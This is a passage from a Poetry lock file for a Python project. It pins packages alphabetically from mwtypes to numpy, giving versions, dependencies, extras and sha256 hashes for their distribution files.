{file = "mwtypes-0.3.2.tar.gz", hash = "sha256:dc1176c5965629c123e859b319ae6151d4e385531e9a781604c0d4ca3434e399"},
]
[package.dependencies]
jsonable = ">=0.3.0"
[[package]]
name = "mwxml"
version = "0.3.3"
description = "A set of utilities for processing MediaWiki XML dump data."
optional = true
python-versions = "*"
files = [
{file = "mwxml-0.3.3-py2.py3-none-any.whl", hash = "sha256:9695848b8b6987b6f6addc2a8accba5b2bcbc543702598194e182b508ab568a9"},
{file = "mwxml-0.3.3.tar.gz", hash = "sha256:0848df0cf2e293718f554311acf4715bd679f639f4e52cbe47d8206589db1d31"},
]
[package.dependencies]
jsonschema = ">=2.5.1"
mwcli = ">=0.0.2"
mwtypes = ">=0.3.0"
para = ">=0.0.1"
[[package]]
name = "mypy"
version = "0.991"
description = "Optional static typing for Python"
optional = false
python-versions = ">=3.7"
files = [
{file = "mypy-0.991-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:7d17e0a9707d0772f4a7b878f04b4fd11f6f5bcb9b3813975a9b13c9332153ab"},
{file = "mypy-0.991-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:0714258640194d75677e86c786e80ccf294972cc76885d3ebbb560f11db0003d"},
{file = "mypy-0.991-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:0c8f3be99e8a8bd403caa8c03be619544bc2c77a7093685dcf308c6b109426c6"},
{file = "mypy-0.991-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bc9ec663ed6c8f15f4ae9d3c04c989b744436c16d26580eaa760ae9dd5d662eb"},
{file = "mypy-0.991-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:4307270436fd7694b41f913eb09210faff27ea4979ecbcd849e57d2da2f65305"},
{file = "mypy-0.991-cp310-cp310-win_amd64.whl", hash = "sha256:901c2c269c616e6cb0998b33d4adbb4a6af0ac4ce5cd078afd7bc95830e62c1c"},
{file = "mypy-0.991-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:d13674f3fb73805ba0c45eb6c0c3053d218aa1f7abead6e446d474529aafc372"},
{file = "mypy-0.991-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:1c8cd4fb70e8584ca1ed5805cbc7c017a3d1a29fb450621089ffed3e99d1857f"},
{file = "mypy-0.991-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:209ee89fbb0deed518605edddd234af80506aec932ad28d73c08f1400ef80a33"},
{file = "mypy-0.991-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:37bd02ebf9d10e05b00d71302d2c2e6ca333e6c2a8584a98c00e038db8121f05"},
{file = "mypy-0.991-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:26efb2fcc6b67e4d5a55561f39176821d2adf88f2745ddc72751b7890f3194ad"},
{file = "mypy-0.991-cp311-cp311-win_amd64.whl", hash = "sha256:3a700330b567114b673cf8ee7388e949f843b356a73b5ab22dd7cff4742a5297"},
{file = "mypy-0.991-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:1f7d1a520373e2272b10796c3ff721ea1a0712288cafaa95931e66aa15798813"},
{file = "mypy-0.991-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:641411733b127c3e0dab94c45af15fea99e4468f99ac88b39efb1ad677da5711"},
{file = "mypy-0.991-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:3d80e36b7d7a9259b740be6d8d906221789b0d836201af4234093cae89ced0cd"},
{file = "mypy-0.991-cp37-cp37m-win_amd64.whl", hash = "sha256:e62ebaad93be3ad1a828a11e90f0e76f15449371ffeecca4a0a0b9adc99abcef"},
{file = "mypy-0.991-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:b86ce2c1866a748c0f6faca5232059f881cda6dda2a893b9a8373353cfe3715a"},
{file = "mypy-0.991-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ac6e503823143464538efda0e8e356d871557ef60ccd38f8824a4257acc18d93"},
{file = "mypy-0.991-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:0cca5adf694af539aeaa6ac633a7afe9bbd760df9d31be55ab780b77ab5ae8bf"},
{file = "mypy-0.991-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a12c56bf73cdab116df96e4ff39610b92a348cc99a1307e1da3c3768bbb5b135"},
{file = "mypy-0.991-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:652b651d42f155033a1967739788c436491b577b6a44e4c39fb340d0ee7f0d70"},
{file = "mypy-0.991-cp38-cp38-win_amd64.whl", hash = "sha256:4175593dc25d9da12f7de8de873a33f9b2b8bdb4e827a7cae952e5b1a342e243"},
{file = "mypy-0.991-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:98e781cd35c0acf33eb0295e8b9c55cdbef64fcb35f6d3aa2186f289bed6e80d"},
{file = "mypy-0.991-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:6d7464bac72a85cb3491c7e92b5b62f3dcccb8af26826257760a552a5e244aa5"},
{file = "mypy-0.991-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:c9166b3f81a10cdf9b49f2d594b21b31adadb3d5e9db9b834866c3258b695be3"},
{file = "mypy-0.991-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b8472f736a5bfb159a5e36740847808f6f5b659960115ff29c7cecec1741c648"},
{file = "mypy-0.991-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:5e80e758243b97b618cdf22004beb09e8a2de1af481382e4d84bc52152d1c476"},
{file = "mypy-0.991-cp39-cp39-win_amd64.whl", hash = "sha256:74e259b5c19f70d35fcc1ad3d56499065c601dfe94ff67ae48b85596b9ec1461"},
{file = "mypy-0.991-py3-none-any.whl", hash = "sha256:de32edc9b0a7e67c2775e574cb061a537660e51210fbf6006b0b36ea695ae9bb"},
{file = "mypy-0.991.tar.gz", hash = "sha256:3c0165ba8f354a6d9881809ef29f1a9318a236a6d81c690094c5df32107bde06"},
]
[package.dependencies]
mypy-extensions = ">=0.4.3"
tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""}
typing-extensions = ">=3.10"
[package.extras]
dmypy = ["psutil (>=4.0)"]
install-types = ["pip"]
python2 = ["typed-ast (>=1.4.0,<2)"]
reports = ["lxml"]
[[package]]
name = "mypy-extensions"
version = "1.0.0"
description = "Type system extensions for programs checked with the mypy type checker."
optional = false
python-versions = ">=3.5"
files = [
{file = "mypy_extensions-1.0.0-py3-none-any.whl", hash = "sha256:4392f6c0eb8a5668a69e23d168ffa70f0be9ccfd32b5cc2d26a34ae5b844552d"},
{file = "mypy_extensions-1.0.0.tar.gz", hash = "sha256:75dbf8955dc00442a438fc4d0666508a9a97b6bd41aa2f0ffe9d2f2725af0782"},
]
[[package]]
name = "mypy-protobuf"
version = "3.3.0"
description = "Generate mypy stub files from protobuf specs"
optional = false
python-versions = ">=3.7"
files = [
{file = "mypy-protobuf-3.3.0.tar.gz", hash = "sha256:24f3b0aecb06656e983f58e07c732a90577b9d7af3e1066fc2b663bbf0370248"},
{file = "mypy_protobuf-3.3.0-py3-none-any.whl", hash = "sha256:15604f6943b16c05db646903261e3b3e775cf7f7990b7c37b03d043a907b650d"},
]
[package.dependencies]
protobuf = ">=3.19.4"
types-protobuf = ">=3.19.12"
[[package]]
name = "nbclient"
version = "0.8.0"
description = "A client library for executing notebooks. Formerly nbconvert's ExecutePreprocessor."
optional = false
python-versions = ">=3.8.0"
files = [
{file = "nbclient-0.8.0-py3-none-any.whl", hash = "sha256:25e861299e5303a0477568557c4045eccc7a34c17fc08e7959558707b9ebe548"},
{file = "nbclient-0.8.0.tar.gz", hash = "sha256:f9b179cd4b2d7bca965f900a2ebf0db4a12ebff2f36a711cb66861e4ae158e55"},
]
[package.dependencies]
jupyter-client = ">=6.1.12"
jupyter-core = ">=4.12,<5.0.dev0 || >=5.1.dev0"
nbformat = ">=5.1"
traitlets = ">=5.4"
[package.extras]
dev = ["pre-commit"]
docs = ["autodoc-traits", "mock", "moto", "myst-parser", "nbclient[test]", "sphinx (>=1.7)", "sphinx-book-theme", "sphinxcontrib-spelling"]
test = ["flaky", "ipykernel (>=6.19.3)", "ipython", "ipywidgets", "nbconvert (>=7.0.0)", "pytest (>=7.0)", "pytest-asyncio", "pytest-cov (>=4.0)", "testpath", "xmltodict"]
[[package]]
name = "nbconvert"
version = "7.9.2"
description = "Converting Jupyter Notebooks"
optional = false
python-versions = ">=3.8"
files = [
{file = "nbconvert-7.9.2-py3-none-any.whl", hash = "sha256:39fe4b8bdd1b0104fdd86fc8a43a9077ba64c720bda4c6132690d917a0a154ee"},
{file = "nbconvert-7.9.2.tar.gz", hash = "sha256:e56cc7588acc4f93e2bb5a34ec69028e4941797b2bfaf6462f18a41d1cc258c9"},
]
[package.dependencies]
beautifulsoup4 = "*"
bleach = "!=5.0.0"
defusedxml = "*"
importlib-metadata = {version = ">=3.6", markers = "python_version < \"3.10\""}
jinja2 = ">=3.0"
jupyter-core = ">=4.7"
jupyterlab-pygments = "*"
markupsafe = ">=2.0"
mistune = ">=2.0.3,<4"
nbclient = ">=0.5.0"
nbformat = ">=5.7"
packaging = "*"
pandocfilters = ">=1.4.1"
pygments = ">=2.4.1"
tinycss2 = "*"
traitlets = ">=5.1"
[package.extras]
all = ["nbconvert[docs,qtpdf,serve,test,webpdf]"]
docs = ["ipykernel", "ipython", "myst-parser", "nbsphinx (>=0.2.12)", "pydata-sphinx-theme", "sphinx (==5.0.2)", "sphinxcontrib-spelling"]
qtpdf = ["nbconvert[qtpng]"]
qtpng = ["pyqtwebengine (>=5.15)"]
serve = ["tornado (>=6.1)"]
test = ["flaky", "ipykernel", "ipywidgets (>=7)", "pytest", "pytest-dependency"]
webpdf = ["playwright"]
[[package]]
name = "nbformat"
version = "5.9.2"
description = "The Jupyter Notebook format"
optional = false
python-versions = ">=3.8"
files = [
{file = "nbformat-5.9.2-py3-none-any.whl", hash = "sha256:1c5172d786a41b82bcfd0c23f9e6b6f072e8fb49c39250219e4acfff1efe89e9"},
{file = "nbformat-5.9.2.tar.gz", hash = "sha256:5f98b5ba1997dff175e77e0c17d5c10a96eaed2cbd1de3533d1fc35d5e111192"},
]
[package.dependencies]
fastjsonschema = "*"
jsonschema = ">=2.6"
jupyter-core = "*"
traitlets = ">=5.1"
[package.extras]
docs = ["myst-parser", "pydata-sphinx-theme", "sphinx", "sphinxcontrib-github-alt", "sphinxcontrib-spelling"]
test = ["pep440", "pre-commit", "pytest", "testpath"]
[[package]]
name = "nebula3-python"
version = "3.4.0"
description = "Python client for NebulaGraph V3.4"
optional = true
python-versions = "*"
files = [
{file = "nebula3-python-3.4.0.tar.gz", hash = "sha256:47bd8b1b4bb2c2f0e5122bc147926cb50578a66841acf6a743cae4d0362c9eaa"},
{file = "nebula3_python-3.4.0-py3-none-any.whl", hash = "sha256:d9d94c6a41712875e6ec866907de0789057f860e64f547f87d9f199439759dd6"},
]
[package.dependencies]
future = ">=0.18.0"
httplib2 = ">=0.20.0"
pytz = ">=2021.1"
six = ">=1.16.0"
[[package]]
name = "neo4j"
version = "5.14.0"
description = "Neo4j Bolt driver for Python"
optional = true
python-versions = ">=3.7"
files = [
{file = "neo4j-5.14.0.tar.gz", hash = "sha256:6040efca47126c01385f09e550fb7d7671b1853a1e1c34908aa3713cebd285da"},
]
[package.dependencies]
pytz = "*"
[package.extras]
numpy = ["numpy (>=1.7.0,<2.0.0)"]
pandas = ["numpy (>=1.7.0,<2.0.0)", "pandas (>=1.1.0,<3.0.0)"]
pyarrow = ["pyarrow (>=1.0.0)"]
[[package]]
name = "nest-asyncio"
version = "1.5.8"
description = "Patch asyncio to allow nested event loops"
optional = false
python-versions = ">=3.5"
files = [
{file = "nest_asyncio-1.5.8-py3-none-any.whl", hash = "sha256:accda7a339a70599cb08f9dd09a67e0c2ef8d8d6f4c07f96ab203f2ae254e48d"},
{file = "nest_asyncio-1.5.8.tar.gz", hash = "sha256:25aa2ca0d2a5b5531956b9e273b45cf664cae2b145101d73b86b199978d48fdb"},
]
[[package]]
name = "networkx"
version = "3.1"
description = "Python package for creating and manipulating graphs and networks"
optional = true
python-versions = ">=3.8"
files = [
{file = "networkx-3.1-py3-none-any.whl", hash = "sha256:4f33f68cb2afcf86f28a45f43efc27a9386b535d567d2127f8f61d51dec58d36"},
{file = "networkx-3.1.tar.gz", hash = "sha256:de346335408f84de0eada6ff9fafafff9bcda11f0a0dfaa931133debb146ab61"},
]
[package.extras]
default = ["matplotlib (>=3.4)", "numpy (>=1.20)", "pandas (>=1.3)", "scipy (>=1.8)"]
developer = ["mypy (>=1.1)", "pre-commit (>=3.2)"]
doc = ["nb2plots (>=0.6)", "numpydoc (>=1.5)", "pillow (>=9.4)", "pydata-sphinx-theme (>=0.13)", "sphinx (>=6.1)", "sphinx-gallery (>=0.12)", "texext (>=0.6.7)"]
extra = ["lxml (>=4.6)", "pydot (>=1.4.2)", "pygraphviz (>=1.10)", "sympy (>=1.10)"]
test = ["codecov (>=2.1)", "pytest (>=7.2)", "pytest-cov (>=4.0)"]
[[package]]
name = "newspaper3k"
version = "0.2.8"
description = "Simplified python article discovery & extraction."
optional = true
python-versions = "*"
files = [
{file = "newspaper3k-0.2.8-py3-none-any.whl", hash = "sha256:44a864222633d3081113d1030615991c3dbba87239f6bbf59d91240f71a22e3e"},
{file = "newspaper3k-0.2.8.tar.gz", hash = "sha256:9f1bd3e1fb48f400c715abf875cc7b0a67b7ddcd87f50c9aeeb8fcbbbd9004fb"},
]
[package.dependencies]
beautifulsoup4 = ">=4.4.1"
cssselect = ">=0.9.2"
feedfinder2 = ">=0.0.4"
feedparser = ">=5.2.1"
jieba3k = ">=0.35.1"
lxml = ">=3.6.0"
nltk = ">=3.2.1"
Pillow = ">=3.3.0"
python-dateutil = ">=2.5.3"
PyYAML = ">=3.11"
requests = ">=2.10.0"
tinysegmenter = "0.3"
tldextract = ">=2.0.1"
[[package]]
name = "nlpcloud"
version = "1.1.44"
description = "Python client for the NLP Cloud API"
optional = true
python-versions = "*"
files = [
{file = "nlpcloud-1.1.44-py3-none-any.whl", hash = "sha256:ca05fe9d6bd7def583b4202b63ca423234c5b921e2ced5a20e9a0020619dc4c5"},
{file = "nlpcloud-1.1.44.tar.gz", hash = "sha256:74e5bf33d1492620a28b8fa5649e8f8366c0752a6e978251b7361d23b56025b3"},
]
[package.dependencies]
requests = "*"
[[package]]
name = "nltk"
version = "3.8.1"
description = "Natural Language Toolkit"
optional = true
python-versions = ">=3.7"
files = [
{file = "nltk-3.8.1-py3-none-any.whl", hash = "sha256:fd5c9109f976fa86bcadba8f91e47f5e9293bd034474752e92a520f81c93dda5"},
{file = "nltk-3.8.1.zip", hash = "sha256:1834da3d0682cba4f2cede2f9aad6b0fafb6461ba451db0efb6f9c39798d64d3"},
]
[package.dependencies]
click = "*"
joblib = "*"
regex = ">=2021.8.3"
tqdm = "*"
[package.extras]
all = ["matplotlib", "numpy", "pyparsing", "python-crfsuite", "requests", "scikit-learn", "scipy", "twython"]
corenlp = ["requests"]
machine-learning = ["numpy", "python-crfsuite", "scikit-learn", "scipy"]
plot = ["matplotlib"]
tgrep = ["pyparsing"]
twitter = ["twython"]
[[package]]
name = "nomic"
version = "1.1.14"
description = "The offical Nomic python client."
optional = true
python-versions = "*"
files = [
{file = "nomic-1.1.14.tar.gz", hash = "sha256:7980516131a125988cea47d7390063d90a9f5bdc6d6063574b6bfbb9897a7202"},
]
[package.dependencies]
click = "*"
cohere = "*"
jsonlines = "*"
loguru = "*"
numpy = "*"
pyarrow = "*"
pydantic = "*"
requests = "*"
rich = "*"
tqdm = "*"
wonderwords = "*"
[package.extras]
dev = ["black", "cairosvg", "coverage", "mkautodoc", "mkdocs-jupyter", "mkdocs-material", "mkdocstrings[python]", "myst-parser", "pillow", "pylint", "pytest", "twine"]
gpt4all = ["peft (==0.3.0.dev0)", "sentencepiece", "torch", "transformers (==4.28.0.dev0)"]
[[package]]
name = "notebook"
version = "7.0.6"
description = "Jupyter Notebook - A web-based notebook environment for interactive computing"
optional = false
python-versions = ">=3.8"
files = [
{file = "notebook-7.0.6-py3-none-any.whl", hash = "sha256:0fe8f67102fea3744fedf652e4c15339390902ca70c5a31c4f547fa23da697cc"},
{file = "notebook-7.0.6.tar.gz", hash = "sha256:ec6113b06529019f7f287819af06c97a2baf7a95ac21a8f6e32192898e9f9a58"},
]
[package.dependencies]
jupyter-server = ">=2.4.0,<3"
jupyterlab = ">=4.0.2,<5"
jupyterlab-server = ">=2.22.1,<3"
notebook-shim = ">=0.2,<0.3"
tornado = ">=6.2.0"
[package.extras]
dev = ["hatch", "pre-commit"]
docs = ["myst-parser", "nbsphinx", "pydata-sphinx-theme", "sphinx (>=1.3.6)", "sphinxcontrib-github-alt", "sphinxcontrib-spelling"]
test = ["importlib-resources (>=5.0)", "ipykernel", "jupyter-server[test] (>=2.4.0,<3)", "jupyterlab-server[test] (>=2.22.1,<3)", "nbval", "pytest (>=7.0)", "pytest-console-scripts", "pytest-timeout", "pytest-tornasync", "requests"]
[[package]]
name = "notebook-shim"
version = "0.2.3"
description = "A shim layer for notebook traits and config"
optional = false
python-versions = ">=3.7"
files = [
{file = "notebook_shim-0.2.3-py3-none-any.whl", hash = "sha256:a83496a43341c1674b093bfcebf0fe8e74cbe7eda5fd2bbc56f8e39e1486c0c7"},
{file = "notebook_shim-0.2.3.tar.gz", hash = "sha256:f69388ac283ae008cd506dda10d0288b09a017d822d5e8c7129a152cbd3ce7e9"},
]
[package.dependencies]
jupyter-server = ">=1.8,<3"
[package.extras]
test = ["pytest", "pytest-console-scripts", "pytest-jupyter", "pytest-tornasync"]
[[package]]
name = "numba"
version = "0.58.1"
description = "compiling Python code using LLVM"
optional = true
python-versions = ">=3.8"
files = [
{file = "numba-0.58.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:07f2fa7e7144aa6f275f27260e73ce0d808d3c62b30cff8906ad1dec12d87bbe"},
{file = "numba-0.58.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:7bf1ddd4f7b9c2306de0384bf3854cac3edd7b4d8dffae2ec1b925e4c436233f"},
{file = "numba-0.58.1-cp310-cp310-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:bc2d904d0319d7a5857bd65062340bed627f5bfe9ae4a495aef342f072880d50"},
{file = "numba-0.58.1-cp310-cp310-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:4e79b6cc0d2bf064a955934a2e02bf676bc7995ab2db929dbbc62e4c16551be6"},
{file = "numba-0.58.1-cp310-cp310-win_amd64.whl", hash = "sha256:81fe5b51532478149b5081311b0fd4206959174e660c372b94ed5364cfb37c82"},
{file = "numba-0.58.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:bcecd3fb9df36554b342140a4d77d938a549be635d64caf8bd9ef6c47a47f8aa"},
{file = "numba-0.58.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:a1eaa744f518bbd60e1f7ccddfb8002b3d06bd865b94a5d7eac25028efe0e0ff"},
{file = "numba-0.58.1-cp311-cp311-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:bf68df9c307fb0aa81cacd33faccd6e419496fdc621e83f1efce35cdc5e79cac"},
{file = "numba-0.58.1-cp311-cp311-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:55a01e1881120e86d54efdff1be08381886fe9f04fc3006af309c602a72bc44d"},
{file = "numba-0.58.1-cp311-cp311-win_amd64.whl", hash = "sha256:811305d5dc40ae43c3ace5b192c670c358a89a4d2ae4f86d1665003798ea7a1a"},
{file = "numba-0.58.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ea5bfcf7d641d351c6a80e8e1826eb4a145d619870016eeaf20bbd71ef5caa22"},
{file = "numba-0.58.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:e63d6aacaae1ba4ef3695f1c2122b30fa3d8ba039c8f517784668075856d79e2"},
{file = "numba-0.58.1-cp38-cp38-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:6fe7a9d8e3bd996fbe5eac0683227ccef26cba98dae6e5cee2c1894d4b9f16c1"},
{file = "numba-0.58.1-cp38-cp38-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:898af055b03f09d33a587e9425500e5be84fc90cd2f80b3fb71c6a4a17a7e354"},
{file = "numba-0.58.1-cp38-cp38-win_amd64.whl", hash = "sha256:d3e2fe81fe9a59fcd99cc572002101119059d64d31eb6324995ee8b0f144a306"},
{file = "numba-0.58.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:5c765aef472a9406a97ea9782116335ad4f9ef5c9f93fc05fd44aab0db486954"},
{file = "numba-0.58.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:9e9356e943617f5e35a74bf56ff6e7cc83e6b1865d5e13cee535d79bf2cae954"},
{file = "numba-0.58.1-cp39-cp39-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:240e7a1ae80eb6b14061dc91263b99dc8d6af9ea45d310751b780888097c1aaa"},
{file = "numba-0.58.1-cp39-cp39-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:45698b995914003f890ad839cfc909eeb9c74921849c712a05405d1a79c50f68"},
{file = "numba-0.58.1-cp39-cp39-win_amd64.whl", hash = "sha256:bd3dda77955be03ff366eebbfdb39919ce7c2620d86c906203bed92124989032"},
{file = "numba-0.58.1.tar.gz", hash = "sha256:487ded0633efccd9ca3a46364b40006dbdaca0f95e99b8b83e778d1195ebcbaa"},
]
[package.dependencies]
importlib-metadata = {version = "*", markers = "python_version < \"3.9\""}
llvmlite = "==0.41.*"
numpy = ">=1.22,<1.27"
[[package]]
name = "numexpr"
version = "2.8.6"
description = "Fast numerical expression evaluator for NumPy"
optional = true
python-versions = ">=3.7"
files = [
{file = "numexpr-2.8.6-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:80acbfefb68bd92e708e09f0a02b29e04d388b9ae72f9fcd57988aca172a7833"},
{file = "numexpr-2.8.6-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:6e884687da8af5955dc9beb6a12d469675c90b8fb38b6c93668c989cfc2cd982"},
{file = "numexpr-2.8.6-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9ef7e8aaa84fce3aba2e65f243d14a9f8cc92aafd5d90d67283815febfe43eeb"},
{file = "numexpr-2.8.6-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dee04d72307c09599f786b9231acffb10df7d7a74b2ce3681d74a574880d13ce"},
{file = "numexpr-2.8.6-cp310-cp310-win32.whl", hash = "sha256:211804ec25a9f6d188eadf4198dd1a92b2f61d7d20993c6c7706139bc4199c5b"},
{file = "numexpr-2.8.6-cp310-cp310-win_amd64.whl", hash = "sha256:18b1804923cfa3be7bbb45187d01c0540c8f6df4928c22a0f786e15568e9ebc5"},
{file = "numexpr-2.8.6-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:95b9da613761e4fc79748535b2a1f58cada22500e22713ae7d9571fa88d1c2e2"},
{file = "numexpr-2.8.6-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:47b45da5aa25600081a649f5e8b2aa640e35db3703f4631f34bb1f2f86d1b5b4"},
{file = "numexpr-2.8.6-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:84979bf14143351c2db8d9dd7fef8aca027c66ad9df9cb5e75c93bf5f7b5a338"},
{file = "numexpr-2.8.6-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d36528a33aa9c23743b3ea686e57526a4f71e7128a1be66210e1511b09c4e4e9"},
{file = "numexpr-2.8.6-cp311-cp311-win32.whl", hash = "sha256:681812e2e71ff1ba9145fac42d03f51ddf6ba911259aa83041323f68e7458002"},
{file = "numexpr-2.8.6-cp311-cp311-win_amd64.whl", hash = "sha256:27782177a0081bd0aab229be5d37674e7f0ab4264ef576697323dd047432a4cd"},
{file = "numexpr-2.8.6-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:ef6e8896457a60a539cb6ba27da78315a9bb31edb246829b25b5b0304bfcee91"},
{file = "numexpr-2.8.6-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e640bc0eaf1b59f3dde52bc02bbfda98e62f9950202b0584deba28baf9f36bbb"},
{file = "numexpr-2.8.6-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d126938c2c3784673c9c58d94e00b1570aa65517d9c33662234d442fc9fb5795"},
{file = "numexpr-2.8.6-cp37-cp37m-win32.whl", hash = "sha256:e93d64cd20940b726477c3cb64926e683d31b778a1e18f9079a5088fd0d8e7c8"},
{file = "numexpr-2.8.6-cp37-cp37m-win_amd64.whl", hash = "sha256:31cf610c952eec57081171f0b4427f9bed2395ec70ec432bbf45d260c5c0cdeb"},
{file = "numexpr-2.8.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:b5f96c89aa0b1f13685ec32fa3d71028db0b5981bfd99a0bbc271035949136b3"},
{file = "numexpr-2.8.6-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:c8f37f7a6af3bdd61f2efd1cafcc083a9525ab0aaf5dc641e7ec8fc0ae2d3aa1"},
{file = "numexpr-2.8.6-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:38b8b90967026bbc36c7aa6e8ca3b8906e1990914fd21f446e2a043f4ee3bc06"},
{file = "numexpr-2.8.6-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1967c16f61c27df1cdc43ba3c0ba30346157048dd420b4259832276144d0f64e"},
{file = "numexpr-2.8.6-cp38-cp38-win32.whl", hash = "sha256:15469dc722b5ceb92324ec8635411355ebc702303db901ae8cc87f47c5e3a124"},
{file = "numexpr-2.8.6-cp38-cp38-win_amd64.whl", hash = "sha256:95c09e814b0d6549de98b5ded7cdf7d954d934bb6b505432ff82e83a6d330bda"},
{file = "numexpr-2.8.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:aa0f661f5f4872fd7350cc9895f5d2594794b2a7e7f1961649a351724c64acc9"},
{file = "numexpr-2.8.6-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:8e3e6f1588d6c03877cb3b3dcc3096482da9d330013b886b29cb9586af5af3eb"},
{file = "numexpr-2.8.6-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8564186aad5a2c88d597ebc79b8171b52fd33e9b085013e1ff2208f7e4b387e3"},
{file = "numexpr-2.8.6-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d6a88d71c166e86b98d34701285d23e3e89d548d9f5ae3f4b60919ac7151949f"},
{file = "numexpr-2.8.6-cp39-cp39-win32.whl", hash = "sha256:c48221b6a85494a7be5a022899764e58259af585dff031cecab337277278cc93"},
{file = "numexpr-2.8.6-cp39-cp39-win_amd64.whl", hash = "sha256:6d7003497d82ef19458dce380b36a99343b96a3bd5773465c2d898bf8f5a38f9"},
{file = "numexpr-2.8.6.tar.gz", hash = "sha256:6336f8dba3f456e41a4ffc3c97eb63d89c73589ff6e1707141224b930263260d"},
]
[package.dependencies]
numpy = ">=1.13.3"
[[package]]
name = "numpy"
version = "1.24.4"
description = "Fundamental package for array computing in Python"
optional = false
python-versions = ">=3.8"
files = [
{file = "numpy-1.24.4-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c0bfb52d2169d58c1cdb8cc1f16989101639b34c7d3ce60ed70b19c63eba0b64"},
{file = "numpy-1.24.4-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:ed094d4f0c177b1b8e7aa9cba7d6ceed51c0e569a5318ac0ca9a090680a6a1b1"},
{file = "numpy-1.24.4-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:79fc682a374c4a8ed08b331bef9c5f582585d1048fa6d80bc6c35bc384eee9b4"},
{file = "numpy-1.24.4-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7ffe43c74893dbf38c2b0a1f5428760a1a9c98285553c89e12d70a96a7f3a4d6"},
{file = "numpy-1.24.4-cp310-cp310-win32.whl", hash = "sha256:4c21decb6ea94057331e111a5bed9a79d335658c27ce2adb580fb4d54f2ad9bc"},
{file = "numpy-1.24.4-cp310-cp310-win_amd64.whl", hash = "sha256:b4bea75e47d9586d31e892a7401f76e909712a0fd510f58f5337bea9572c571e"},
{file = "numpy-1.24.4-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:f136bab9c2cfd8da131132c2cf6cc27331dd6fae65f95f69dcd4ae3c3639c810"},
{file = "numpy-1.24.4-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:e2926dac25b313635e4d6cf4dc4e51c8c0ebfed60b801c799ffc4c32bf3d1254"},
{file = "numpy-1.24.4-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:222e40d0e2548690405b0b3c7b21d1169117391c2e82c378467ef9ab4c8f0da7"},
{file = "numpy-1.24.4-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7215847ce88a85ce39baf9e89070cb860c98fdddacbaa6c0da3ffb31b3350bd5"},
